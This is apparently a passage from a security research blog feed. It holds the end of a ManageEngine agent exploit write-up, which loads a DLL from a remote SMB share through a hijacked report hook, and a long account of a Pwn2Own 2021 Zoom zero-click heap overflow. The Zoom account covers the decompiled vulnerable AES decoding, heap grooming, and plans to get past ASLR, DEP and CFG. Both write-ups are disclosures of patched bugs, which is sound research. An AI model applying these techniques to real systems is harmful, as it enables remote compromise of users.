I am unable to write executable pointers with my write primitive, so this means I can’t just write this GetPdbDll function address as a return address on stack memory nor can I even overwrite a function pointer with this function address. There was one place however, that I saw a pointer TO a function pointer being called which is actually possible for me to abuse. It’s in _CrtDbgReport function, which allows Microsoft runtime to alert in event of various integrity violations, one of which is a failure in heap integrity check. When using a debug heap (like in this scenario) it can be triggered if it detects unwritten portions of heap memory not containing “0xfd” bytes, since that is supposed to represent “dead-land-fill” (this is why my PoC tries to mimic these 0xfd bytes during my heap overflow, to keep this thing happy). However this time…we WANT to trigger a failure, because in _CrtDbgReport we see this:

From my research, this is where _CrtDbgReport calls a _pfnReportHook (if the application has one registered). This application does not have one registered, but let us leverage our Free_dbg write primitive again to write our own _pfnReportHook (it lives in .data section too!). This is also great because this doesn’t have to be a pointer to executable memory (which we can’t write), because _pfnReportHook contains a pointer TO a function pointer (big beneficial difference for us). We just need to register our own _pfnReportHook that contains a function pointer to that function that loads “MSPDB80.dll” (no arguments needed!). Then we trigger a heap error so that _CrtDbgReport is called and in turn calls our _pfnReportHook. This should load and execute the “MSPDB80.dll” off our remote SMB share. We have to be clever with our second write primitive, as we can no longer borrow the technique I used earlier where you use subsequent heap cell allocations to bypass infoleak. This is because the unique scenario was only for unicode strings in this application, and we can’t represent our function pointers with unicode. For this step I choose to overwrite the _pfnReportHook variable with a random offset in my heap entirely (again, no infoleak required, similar technique as partially overwriting the _CrtMemBlockHeader* next pointer but this time overwriting the lower two bytes of the _CrtMemBlockHeader* next pointer in order to obtain a decent random heap offset). I then trigger my heap overflow again in order to clobber an enormous portion of the heap with repeating function pointers to the GetPdb function.

Yes this will certainly crash the program but that’s ok! We are at the finish line and this severe heap corruption will trigger a call to our _pfnReportHook before a crash happens. From our earlier overwrite, our _pfnReportHook pointer should point to some random address in my heap which likely contains a GetPdbDll function pointer (which I massively sprayed). This should result in RCE once _pfnReportHook is called.

Loading dll off remote SMB share that displays a whoami

As mentioned, this is not a super reliable exploit as-is, but I was able to prove it can work. You should be able to find the PoC for this on Tenable’s PoC github — https://github.com/tenable/poc. Manage Engine has since patched this issue. For more of these details you can check out this ManageEngine advisory at https://www.tenable.com/security/research.

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Zoom RCE from Pwn2Own 2021

Sector 7

23 August 2021 at 00:00

On April 7 2021, Thijs Alkemade and Daan Keuper demonstrated a zero-click remote code execution exploit in the Zoom video client during Pwn2Own 2021. Now that related bugs have been fixed for all users (see ZDI-21-971 and ZSB-22003) we can safely detail the bugs we exploited and how we found them. In this blog post, we wanted to not only explain the bugs and our exploit, but provide a log of our entire process. We hope that detailing our process helps others with similar research in the future. While we had profound experience with exploiting memory corruption vulnerabilities on many platforms, both of us had zero experience with this on Windows. So during this project we had a lot to learn about the Windows internals.

Wow - with just 10 seconds left of their 2nd attempt, Daan Keuper and Thijs Alkemade were able to demonstrate their code execution via Zoom messenger. 0 clicks were used in the demo. They're off to the disclosure room for details. #Pwn2Own pic.twitter.com/qpw7yIEQLS
— Zero Day Initiative (@thezdi) April 7, 2021

This is going to be quite a long post. So before we dive into the details, now that the vulnerabilities have been fixed, below you can see a full run of the exploit (now fixed) in action. The post hereafter will explain in detail every step that took place during the exploitation phase and how we came to this solution.

Announcement

Participating in Pwn2Own was one of the initial goals we had for our new research department, Sector 7. When we made our plans last year, we didn’t expect that it would be as soon as April 2021. In recent years the Vancouver edition in spring has focused on browsers, local privilege escalation and virtual machines. The software in these categories has received a lot of attention to security, including many specific defensive layers. We’d also be competing with many others who may have had a full year to prepare their exploits.

To our surprise, on January 27th Pwn2Own was officially announced with a new category: “Enterprise Communications”, featuring Microsoft Teams and the Zoom Meetings client. These tools have become incredibly important due to the pandemic, so it makes sense for those to be added to Pwn2Own. We realized that either of these would be a much better target for us, because most researchers would have to start from scratch.

Announcing #Pwn2Own Vancouver 2021! Over $1.5 million available across 7 categories. #Tesla returns as a partner, and we team up with #Zoom for the new Enterprise Communications category. Read all the details at https://t.co/suCceKxI0T #P2O
— Zero Day Initiative (@thezdi) January 26, 2021

We had not yet decided between Zoom and Microsoft Teams. We made a guess for what type of vulnerability we would expect could lead to RCE in those applications: Microsoft Teams is developed using Electron with a few native libraries in C++ (mainly for platform integration). Electron apps are built using HTML+JavaScript with a Chromium runtime included. The most likely path for exploitation would therefore be a cross-site scripting issue, possibly in combination with a sandbox escape. Memory corruption could be possible, but the number of native libraries is small. Zoom is written in C++, meaning the most likely vulnerability class would be memory corruption. Without any good data on which would be more likely, we decided on Zoom, simply because we like doing research on memory corruption more than XSS.

Step 1: What is this “Zoom”?

Both of us had not used Zoom much (if at all). So, our very first step was to go through the application thoroughly, focused on identifying all ways you can send something to another user, as that was the vector we wanted for the attack. That turned out to be quite a list. Most users will mainly know the video chat functionality, but there is also a quite full featured chat client included, with the ability to send images, create group chats, and many more. Within meetings, there’s of course audio and video, but also another way to chat, send files, share the screen, etc. We made a few premium accounts too, to make sure we saw as much as possible of the features.

Step 2: Network interception

The next step was to get visibility in the network communication of the client. We would need to see the contents of the communication in order to be able to send our own malicious traffic. Zoom uses a lot of HTTPS requests (often with JSON or protobufs), but the chat connection itself uses a XMPP connection. Meetings appear to have a number of different options depending on what the network allows, the main one a custom UDP based protocol. Using a combination of proxies, modified DNS records, sslsplit and a new CA certificate installed in Windows, we were able to inspect all traffic, including HTTP and XMPP, in our test environment. We initially focused on HTTP and XMPP, as the meeting protocol seemed like a (custom) binary protocol.

Step 3: Disassembly

The following step was to load the relevant binaries in our favorite disassemblers. Because we knew we wanted a vulnerability exploitable from another user, we started with trying to match the handling of incoming XMPP stanzas (a stanza is an XMPP element you can send to another user) to the code. We found that the XMPP XML stream is initially parsed by XmppDll.dll. This DLL is based on the C++ XMPP library gloox. This meant that reverse-engineering this part was quite easy, even for the custom extensions Zoom added.

However, it became quite clear that we weren’t going to find any good vulnerabilities here. XmppDll.dll only parses incoming XMPP stanzas and copies the XML data to a new C++ object. No real business logic is implemented here, everything is passed to a callback in a different DLL.

In the next DLL’s we hit a bit of a wall. The disassembly of the other DLL’s was almost impossible to get through due to a large number of calls to vtables and other DLL’s. Almost nothing was available to give us some grip on the disassembled code. The main reason for that was that most DLL’s do no logging at all. Logs are of course useful for dynamic analysis, but also for static analysis they can be very useful, as they often reveal function and variable names and give information about what checks are performed. We found that Zoom had generated a log of the installation, but while running it nothing was logged at all.

After some searching, we found the support pages for how to generate a Troubleshooting log for Zoom:

After reporting a problem through the desktop client, the Support team may ask you to install a special troubleshooting package of Zoom to log more information about your issue and help Zoom engineers investigate the issue. After recreating the issue, these files need to be sent to your Zoom support agent via your existing ticket. The troubleshooting version does not allow Zoom support or engineering access to your computer, but rather just gathers more information about your specific issue.

This suggests that logging is compile-time disabled, but special builds with logging do exist. They are only given out by support to debug a specific issue. For bug bounties any form of social engineering is usually banned. While the Pwn2Own rules don’t mention it, we did not want to antagonize Zoom about this. Therefore, we decided to ask for this version. As Zoom was sponsoring Pwn2Own, we thought they might be willing to give us that client if we asked through ZDI, so we did just that. It is not uncommon for companies to offer specific tools for researchers to help in their research, such as test units Tesla can give to interested researchers.

Sadly, Zoom turned this request down - we don’t know why. But before we could fall back to any social engineering, we found something else that was almost as good. It turns out Zoom has a SDK that can be used to integrate the Zoom meeting functionality in other applications. This SDK consists of many of the same libraries as the client itself, but in this case these DLL files do have logging present. It doesn’t have all of them (some UI related DLL’s are missing), but it has enough to get a good overview of the functionality of the core message handling.

The logging also revealed file names and function names, as can be seen in this disassembled example:

iVar2 = logging::GetMinLogLevel();
if (iVar2 < 2) {
    logging::LogMessage::LogMessage
              (local_c8,
               "c:\\ZoomCode\\client_sdk_2019_kof\\client\\src\\framework\\common\\SaasBeeWebServiceModule\\ZoomNetworkMonitor.cpp"
               , 0x39, 1);
    uVar3 = log_message(iVar2 + 8, "[NetworkMonitor::~NetworkMonitor()]", " ", uVar1);
    log_message(uVar3);
    logging::LogMessage::~LogMessage(local_c8);
}

Step 4: Hunting for bugs

With this we could start looking for bugs in earnest. Specifically, we were looking for any kind of memory corruption vulnerability. These often occur during parsing of data, but in this case that was not a likely vector for the XMPP connection. A well known library is used for XMPP and we would also need to get our payload through the server, so any invalid XML would not get to the other client. Many operations using strings are using C++ std::string objects, which meant that buffer overflows due to mistakes in length calculations are also not very likely.

About 2 weeks after we started this research, we noticed an interesting thing about the base64 decoding that was happening in a couple of places:

len = Cmm::CStringT<char>::size(param_1);
result = malloc(len << 2);
len = Cmm::CStringT<char>::size(param_1);
buffer = Cmm::CStringT<char>::c_str(param_1);
status = EVP_DecodeBlock(result, buffer, len);

EVP_DecodeBlock is the OpenSSL function that handles base64-decoding. Base64 is an encoding that turns three bytes into four characters, so decoding results in something which is always 3/4 of the size of the input (ignoring any rounding). But instead of allocating something of that size, this code is allocating a buffer which is four times larger than the input buffer (shifting left twice is the same as multiplying by four). Allocating something too big is not an exploitable vulnerability (maybe if you trigger an integer overflow, but that’s not very practical), but what it did show was that when moving data from and to OpenSSL incorrect calculations of buffer sizes might be present. Here, std::string objects will need to be converted to C char* pointers and separate length variables. So we decided to focus on the calling of OpenSSL functions from Zoom’s own code for a while.

Step 5: The Bug

Zoom’s chat functionality supports a setting named “Advanced chat encryption” (only available for paying users). This functionality has been around for a while. By default version 2 is used, but if a contact sends a message using version 1 then it is still handled. This is what we were looking at, which involves a lot of OpenSSL functions.

Version 1 works more or less like this (as far as we could understand from the code):

The sender sends a message encrypted using a symmetric key, with a key identifier indicating which message key was used.

<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="85DC3552-56EE-4307-9F10-483A0CA1C611" type="chat">
  <body>[This is an encrypted message]</body>
  <thread>gloox{BFE86A52-2D91-4DA0-8A78-DC93D3129DA0}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="SendMessage">
      <msg>
        <message>/fWuV6UYSwamNEc40VKAnA==</message>
        <iv>sriMTH04EXSPnphTKWuLuQ==</iv>
      </msg>
      <xkey>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <app v="0"/>
  </ze2e>
  <zmtask feature="35">
    <nos>You have received an encrypted message.</nos>
  </zmtask>
  <zmext expire_t="1680466611000" t="1617394611169">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
  </zmext>
</message>

The recipient checks to see if they have the symmetric key with that key identifier. If not, the recipient’s client automatically sends a RequestKey message to the other user, which includes the recipient’s X509 certificate in order to encrypt the message key (<pub_cert>).

<message xmlns="jabber:client" to="[email protected]" id="{684EF27D-65D3-4387-9473-E87279CCA8B1}" type="chat" from="[email protected]/ZoomChat_pc">
  <thread>gloox{25F7E533-7434-49E3-B3AC-2F702579C347}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <zmext>
    <msg_type>207</msg_type>
    <from n="Jane Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>false</visible>
  </zmext>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>tJKVTqrloavxzawxMZ9Kk0Dak3LaDPKKNb+vcAqMztQ=</scid>
      <recv>[email protected]</recv>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="RequestKey">
      <xkey>
        <pub_cert>MIICcjCCAVqgAwIBAgIBCjANBgkqhkiG9w0BAQsFADA3MSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxEjAQBgNVBAMMCSouem9vbS51czAeFw0yMTA0MDIxMjAzNDVaFw0yMjA0MDIxMjMzNDVaMEoxLDAqBgNVBAMMI2VrM19mZHZ5dHFnbTB6emxtY25kZ2FAeG1wcC56b29tLnVzMQ0wCwYDVQQKEwRaT09NMQswCQYDVQQGEwJVUzCBmzAQBgcqhkjOPQIBBgUrgQQAIwOBhgAEAa5LZ0vdjfjTDbPnuK2Pj1WKRaBee0QoAUQ281Z+uG4Ui58+QBSfWVVWCrG/8R4KTPvhS7/utzNIe+5R8oE69EPFAFNBMe/nCugYfi/EzEtwzor/x1R6sE10rIBGwFwKNSnzxtwDbiFmjpWFFV7TAdT/wr/f1E1ZkVR4ooitgVwGfREVMA0GCSqGSIb3DQEBCwUAA4IBAQAbtx2A+A956elf/eGtF53iQv2PT9I/4SNMIcX5Oe/sJrH1czcTfpMIACpfbc9Iu6n/WNCJK/tmvOmdnFDk2ekDt9jeVmDhwJj2pG+cOdY/0A+5s2E5sFTlBjDmrTB85U4xw8ahiH9FQTvj0J4FJCAPsqn0v6D87auA8K6w13BisZfDH2pQfuviJSfJUOnIPAY5+/uulaUlee2HQ1CZAhFzbBjF9R2LY7oVmfLgn/qbxJ6eFAauhkjn1PMlXEuVHAap1YRD8Y/xZRkyDFGoc9qZQEVj6HygMRklY9xUnaYWgrb9ZlCUaRefLVT3/6J21g6G6eDRtWvE1nMfmyOvTtjC</pub_cert>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <v2data action="None"/>
    <app v="0"/>
  </ze2e>
  <zmtask feature="50"/>
</message>

The sender responds to the RequestKey message with a ResponseKey message. This contains the sender’s X509 certificate in <pub_cert>, an <encoded> XML element, which contains the message key encrypted using both the sender’s private key and the recipient’s public key, and a signature in <signature>.

<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="4D6D109E-2AF2-4444-A6FD-55E26F6AB3F0" type="chat">
  <thread>gloox{24A77779-3F77-414B-8BC7-E162C1F3BDDF}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid>
      <recv>[email protected]</recv>
      <rres>ZoomChat_pc</rres>
      <rcid>tJKVTqrloavxzawxMZ9Kk0Dak3LaDPKKNb+vcAqMztQ=</rcid>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="ResponseKey">
      <xkey create_time="1617394606">
        <pub_cert>MIICcjCCAVqgAwIBAgIBCjANBgkqhkiG9w0BAQsFADA3MSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxEjAQBgNVBAMMCSouem9vbS51czAeFw0yMTAyMTgxOTIzMjJaFw0yMjAyMTgxOTUzMjJaMEoxLDAqBgNVBAMMI2V3Y2psbmlfcndjamF5Z210cHZuZXdAeG1wcC56b29tLnVzMQ0wCwYDVQQKEwRaT09NMQswCQYDVQQGEwJVUzCBmzAQBgcqhkjOPQIBBgUrgQQAIwOBhgAEAPyPYr49WDKcwh2dc1V1GMv5whVyLaC0G/CzsvJXtSoSRouPaRBloBBlay2JpbYiZIrEBek3ONSzRd2Co1WouqXpASo2ADI/+qz3OJiOy/e4ccNzGtCDZTJHWuNVCjlV3abKX8smSDZyXc6eGP72p/xE96h80TLWpqoZHl1Ov+JiSVN/MA0GCSqGSIb3DQEBCwUAA4IBAQCUu+e8Bp9Qg/L2Kd/+AzYkmWeLw60QNVOw27rBLytiH6Ff/OmhZwwLoUbj0j3JATk/FiBpqyN6rMzL/TllWf+6oWT0ZqgdtDkYvjHWI6snTDdN60qHl77dle0Ah+VYS3VehqtqnEhy3oLiP3pGgFUcxloM85BhNGd0YMJkro+mkjvrmRGDu0cAovKrSXtqdXoQdZN1JdvSXfS2Otw/C2x+5oRB5/03aDS8Dw+A5zhCdFZlH4WKzmuWorHoHVMS1AVtfZoF0zHfxp8jpt5igdw/rFZzDxtPnivBqTKgCMSaWE5HJn9JhupHisoJUipGD8mvkxsWqYUUEI2GDauGw893</pub_cert>
        <encoded>...</encoded>
        <signature>MIGHAkIBaq/VH7MvCMnMcY+Eh6W4CN7NozmcXrRSkJJymvec+E5yWqF340QDNY1AjYJ3oc34ljLoxy7JeVjop2s9k1ZPR7cCQWnXQAViihYJyboXmPYTi0jRmmpBn61OkzD6PlAqAq1fyc8e6+e1bPsu9lwF4GkgI40NrPG/kbUx4RbiTp+Ckyo0</signature>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <app v="0"/>
  </ze2e>
  <zmtask feature="50"/>
  <zmext t="1617394613961">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
    <to/>
    <visible>false</visible>
  </zmext>
</message>

The way the key is encrypted has two options, depending on the type of key used by the recipient’s certificate. If it uses a RSA key, then the sender encrypts the message key using the public key of the recipient and signs it using their own private RSA key.

The default, however, is not to use RSA but to use an elliptic curve key using the curve P-521. Algorithms for encryption using elliptic curve keys do not exist (as far as we know). So instead of encrypting directly, elliptic curve Diffie-Helman is used using both users’ keys to obtain a shared secret. The shared secret is split into a key and IV to encrypt the message key data with AES. This is a common approach for encrypting data when using elliptic curve cryptography.

When handling a ResponseKey message, a std::string of a fixed size of 1024 bytes was allocated for the decrypted result. When decrypting using RSA, it was properly validated that the decryption result would fit in that buffer. When decrypting using AES, however, that check was missing. This meant that by sending a ResponseKey message with an AES-encrypted <encoded> element of more than 1024 bytes, it was possible to overflow a heap buffer.

The following snippet shows the function where the overflow happens. This is the SDK version, so with the logging available. Here, param_1[0] is the input buffer, param_1[1] is the input buffer’s length, param_1[2] is the output buffer and param_1[3] the output buffer length. This is a large snippet, but the important part of this function is that param_1[3] is only written to with the resulting length, it is not read first. The actual allocation of the buffer happens in a function a few steps earlier.

undefined4 __fastcall AESDecode(undefined4 *param_1, undefined4 *param_2) {
  char cVar1;
  int iVar2;
  undefined4 uVar3;
  int iVar4;
  LogMessage *this;
  int extraout_EDX;
  int iVar5;
  LogMessage local_180 [176];
  LogMessage local_d0 [176];
  int local_20;
  undefined4 *local_1c;
  int local_18;
  int local_14;
  undefined4 local_8;
  undefined4 uStack4;
  
  uStack4 = 0x170;
  local_8 = 0x101ba696;
  iVar5 = 0;
  local_14 = 0;
  local_1c = param_2;
  cVar1 = FUN_101ba34a();

  if (cVar1 == '\0') {
    return 1;
  }

  if ((*(uint *)(extraout_EDX + 4) < 0x20) || (*(uint *)(extraout_EDX + 0xc) < 0x10)) {
    iVar5 = logging::GetMinLogLevel();
    
    if (iVar5 < 2) {
      logging::LogMessage::LogMessage
                (local_d0, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1d6, 1);
      local_8 = 0;
      local_14 = 1;
      uVar3 = log_message(iVar5 + 8, "[AESDecode] Failed. Key len or IV len is incorrect.", " ");
      log_message(uVar3);
      logging::LogMessage::~LogMessage(local_d0);

      return 1;
    }

    return 1;
  }

  local_14 = param_1[2];
  local_18 = 0;
  iVar2 = EVP_CIPHER_CTX_new();

  if (iVar2 == 0) {
    return 0xc;
  }

  local_20 = iVar2;
  EVP_CIPHER_CTX_reset(iVar2);
  uVar3 = EVP_aes_256_cbc(0, *local_1c, local_1c[2], 0);
  iVar4 = EVP_CipherInit_ex(iVar2, uVar3);

  if (iVar4 < 1) {
    iVar2 = logging::GetMinLogLevel();

    if (iVar2 < 2) {
      logging::LogMessage::LogMessage
                (local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1e8, 1);
      iVar5 = 2;
      local_8 = 1;
      local_14 = 2;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherInit_ex Failed.", " ");
      log_message(uVar3);
    }
LAB_101ba758:
    if (iVar5 == 0) goto LAB_101ba852;
    this = local_d0;
  } else {
    iVar4 = EVP_CipherUpdate(iVar2, local_14, &local_18, *param_1, param_1[1]);

    if (iVar4 < 1) {
      iVar2 = logging::GetMinLogLevel();

      if (iVar2 < 2) {
        logging::LogMessage::LogMessage
                  (local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                  0x1f0, 1);
        iVar5 = 4;
        local_8 = 2;
        local_14 = 4;
        uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherUpdate Failed.", " ");
        log_message(uVar3);
      }
      goto LAB_101ba758;
    }

    param_1[3] = local_18;
    iVar4 = EVP_CipherFinal_ex(iVar2, local_14 + local_18, &local_18);

    if (0 < iVar4) {
      param_1[3] = param_1[3] + local_18;
      EVP_CIPHER_CTX_free(iVar2);
      return 0;
    }

    iVar2 = logging::GetMinLogLevel();
    if (iVar2 < 2) {
      logging::LogMessage::LogMessage
                (local_180,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1fb, 1);
      iVar5 = 8;
      local_8 = 3;
      local_14 = 8;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherFinal_ex Failed.", " ");
      log_message(uVar3);
    }

    if (iVar5 == 0) goto LAB_101ba852;
    this = local_180;
  }
  
  logging::LogMessage::~LogMessage(this);
LAB_101ba852:
  EVP_CIPHER_CTX_free(local_20);
  return 0xc;
}

Side note: we don’t know the format of what the <encoded> element would normally contain after decryption, but from our understanding of the protocol we assume it contains a key. It was easy to initiate the old version of the protocol against a new client. But to have a legitimate client initiate requires an old version of the client, which appears to be malfunctioning (it can no longer log in).

We were about 2 weeks into our research and we had found a buffer overflow we could trigger remotely without user interaction by sending a few chat messages to a user who had previously accepted external contact request or is currently in the same multi-user chat. This was looking promising.

Step 6: Path to exploitation

To build an exploit around it, it is good to first mention some pros and cons of this buffer overflow:

Pro: The size is not directly bounded (implicitly by the maximum size of an XMPP packet, but in practice this is way more than needed).
Pro: The contents are the result of decrypting the buffer, so this can be arbitrary binary data, not limited to printable or non-zero characters.
Pro: It triggers automatically without user interaction (as long as the attacker and victim are contacts).
Con: The size must be a multiple of the AES block size, 16 bytes. There can be padding at the end, but even when padding is present it will still overwrite the data up to a full block before removing the padding.
Con: The heap allocation is of a fixed (and quite large) size: 1040 bytes. (The backing buffer of a std::string on Windows has up to 16 extra bytes for some reason.)
Con: The buffer is allocated and then while handling the same packet used for the overflow. We can not place the buffer first, allocate something else and then overflow.

We did not yet have a full plan for how to exploit this, but we expected that we would most likely need to overwrite a function pointer or vtable in an object. We already knew OpenSSL was used, and it uses function pointers within structs extensively. We could even create a few already during the later handling of ResponseKey messages. We investigated this, but it quickly turned out to be impossible due to the heap allocator in use.

Step 7: Understanding the Windows heap allocator

To implement our exploit, we needed to fully understand how the heap allocator in Windows places allocations. Windows 10 includes two different heap allocators: the NT heap and the Segment Heap. The Segment Heap is new in Windows 10 and only used for specific applications, which don’t include Zoom, so the NT Heap was what is used. The NT Heap has two different allocators (for allocations less than about 16 kB): the front-end allocator (known as the Low-Fragment Heap or LFH) and the back-end allocator.

Before we go into detail for how those two allocators work, we’ll introduce some definitions:

Block: a memory area which can be returned by the allocator, either in use or not.
Bucket: a group of blocks handled by the LFH.
Page: a memory area assigned by the OS to a process.

By default, the back-end allocator handles all allocations. The best way to imagine the back-end allocator is as a sorted list of all free blocks (the freelist). Whenever an allocation request is received for a specific size, the list is traversed until a block is found of at least the requested size. This block is removed from the list and returned. If the block was bigger than the requested size, then it is split and the remainder is inserted in the list again. If no suitable blocks are present, the heap is extended by requesting a new page from the OS, inserting it as a new block at the appropriate location in the list. When an allocation is freed, the allocator first checks if the blocks before and after it are also free. If one or both of them are then those are merged together. The block is inserted into the list again at the location matching its size.

The following video shows how the allocator searches for a block of a specific size (orange), returns it and places the remainder back into the list (green).

The back-end allocator is fully deterministic: if you know the state of the freelist at a certain time and the sequence of allocations and frees that follow, then you can determine the new state of the list. There are some other useful properties too, such as that allocations of a specific size are last-in-first-out: if you allocate a block, free it and immediately allocate the same size, then you will always receive the same address.

The front-end allocator, or LFH, is used for allocations for sizes that are used often to reduce the amount of fragmentation. If more than 17 blocks of a specific size range are allocated and still in use, then the LFH will start handling that specific size from then on. LFH allocations are grouped in buckets each handling a range of allocation sizes. When a request for a specific size is received, the LFH checks the bucket most recently used for an allocation of that size if it still has room. If it does not, it checks if there are any other buckets for that size range with available room. If there are none, a new bucket is created.

No matter if the LFH or back-end allocator is used, each heap allocation (of less than 16 kB) has a header of eight bytes. The first four bytes are encoded, the next four are not. The encoding uses a XOR with a random key, which is used as a security measure against buffer overflows corrupting heap metadata.

For exploiting a heap overflow there are a number of things to consider. The back-end allocator can create adjacent allocations of arbitrary sizes. On the LFH, only objects in the same range are combined in a bucket, so to overwrite a block from a different range you would have to make sure two buckets are placed adjacent. In addition, which free slot from a bucket is used is randomized.

For these reasons we focused initially on the back-end allocator. We quickly realized we couldn’t use any of the OpenSSL objects we found previously: when we launch Zoom in a clean state (no existing chat history), all sizes up to around 700 bytes (and many common sizes above it too) would already be handled by the LFH. It is impossible to switch a specific size back from the LFH to the back-end allocator. Therefore, the OpenSSL objects we identified initially would be impossible to allocate after our overflowing block, as they were all less than 700 bytes so guaranteed to be placed in a LFH bucket.

This meant we had to search more thoroughly for objects of larger sizes in which we might be able to overwrite a function pointer or vtable. We found that one of the other DLL’s, zWebService.dll, includes a copy of libcurl, which gave us some extra source code to analyze. Analyzing source code was much more efficient than having to obtain information about a C++ object’s layout from a decompiler. This did give us some interesting objects to overflow that would not automatically be on the LFH.

Step 8: Heap grooming

In order to place our allocations, we would need to do some extensive heap grooming. We assumed we needed to follow the following procedure:

Allocate a temporary object of 1040 bytes.
Allocate the object we want to overwrite after it.
Free the object of 1040 bytes.
Perform the overflow, hopefully at the same address as the 1040 byte object.

In order to do this, we had to be able to make an allocation of 1040 bytes which we could free at a precise later time. But even more importantly, for this to work we would also need to fill up many holes in the freelist so our two objects would end up adjacent. If we want to allocate the objects directly adjacent, then in the first step there needs to be a free block of size 1040 + x, with x the size of the other object. But this means that there must not be any other allocations of size between 1040 and 1040 + x, otherwise that block would be used instead. This means there is a pretty large range of sizes for which there must not be any free blocks available.

To make arbitrary sized allocations, we stayed close to what we already knew. As we mentioned, if you send an encrypted message with a key identifier the other user does not yet have, then it will request that key. We noticed that this key identifier remained in a std::string in memory, likely because it was waiting for a response. It could be an arbitrary large size, so we had a way to make an allocation. It is also possible to revoke chat messages in Zoom, which would also free the pending key request. This gave us a primitive for allocating and freeing a specific size block, but it was quite crude: it would always allocate 2 copies of that string (for some reason), and in order to handle a new incoming message it would make quite a few temporary copies.

We spent a lot of time making allocations by sending messages and monitoring the state of the freelist. For this, we wrote some Frida scripts for tracking allocations, printing the freelist and checking the LFH status. These things can all be done by WinDBG, but we found it way too slow to be of use. There was one nice trick we could use: if specific allocations could get in the way of our heap grooming, then we could trigger the LFH for that size to make sure it would no longer affect the freelist by making the client perform at least 17 allocations of that size.

We spent a lot of time on this, but we ran into a problem. Sometimes, randomly, our allocation of 1040 bytes would already be placed on the LFH, even if we launched the application in a clean state. At first, we accepted this risk: a chance of around 25% to fail is still quite acceptable for the 3 attempts in Pwn2Own. But the more concrete our grooming became, the more additional objects and sizes we needed to use, such as for the objects from libcurl we might want to overwrite. With more sizes, it would get more and more likely that at least of one of them would be handled by the LFH already, completely breaking our exploit. We weren’t very keen on participating with a exploit that had already failed 75% of the time by the time the application had finished launching. We had spent a few weeks on trying to gain control over this, but eventually decided to try something else.

Step 9: To the LFH

We decided to investigate how easy it would be to perform our exploit if we forced the allocation we could overflow to the LFH, using the same method of forcing a size to the LFH first. This meant we had to search more thoroughly for objects of appropriate sizes. The allocation of 1040 bytes is placed in a bucket with all LFH allocations of 1025 bytes to 1088 bytes.

Before we go further, lets look at what defensive measures we had to deal with:

ASLR (Address Space Layout Randomization). This means that DLL’s are loaded in random locations and the location of the heap and stack are also randomized. However, because Zoom was a 32-bit application, there is not a very large range of possible addresses for DLL’s and for the heap.
DEP (Data Execution Prevention). This meant that there were no memory pages present that were both writable and executable.
CFG (Control Flow Guard). This is a relatively new technique that is used to check that function pointers and other dynamic addresses point to a valid start location of a function.

We noticed that ASLR and DEP were used correctly by Zoom, but the use of CFG had a weakness: the 2 OpenSSL DLL’s did not have CFG enabled due to an incompatibility in OpenSSL, which was very helpful for us.

CFG works by inserting a check (guard_check_icall) before all dynamic function calls which looks up the address that is about to be called in a list of valid function start addresses. If it is valid, the call is allowed. If not, an exception is raised.

Not enabling CFG for a dll means two things:

Any dynamic function call by this library does not check if the address is a function start location. In other words, guard_check_icall is not inserted.
Any dynamic function call from another library which does use CFG which calls an address in these dlls is always allowed. The valid start location list is not present for these dlls, which means that it allows all addresses in the range of that dll.

Based on this, we formed the following plan:

Leak an address from one of the two OpenSSL DLL’s to deal with ASLR.
Overflow a vtable or function pointer to point to a location in the DLL we have located.
Use a ROP chain to gain arbitrary code execution.

To perform our buffer overflow on the LFH, we needed a way to deal with the randomization. While not perfect, one way we avoided a lot of crashes was to create a lot of new allocations in the size range and then freeing all but the last one. As we mentioned, the LFH returns a random free slot from the current bucket. If the current bucket is full, it looks if there are other not yet full buckets of the same size range. If there are none, the heap is extended and a new bucket is created.

By allocating many new blocks, we guaranteed that all buckets for this size range were full and we got a new bucket. Freeing a number of these allocations, but keeping the last block meant we had a lot of room in this bucket. As long as we didn’t allocate more blocks than would fit, all allocations of our size range would come from here. This was very helpful for reducing the chance of overwriting other objects that happen to fall in the same size range.

The following video shows the “dangerous” objects we don’t want to overwrite in orange, and the safe objects we created in green:

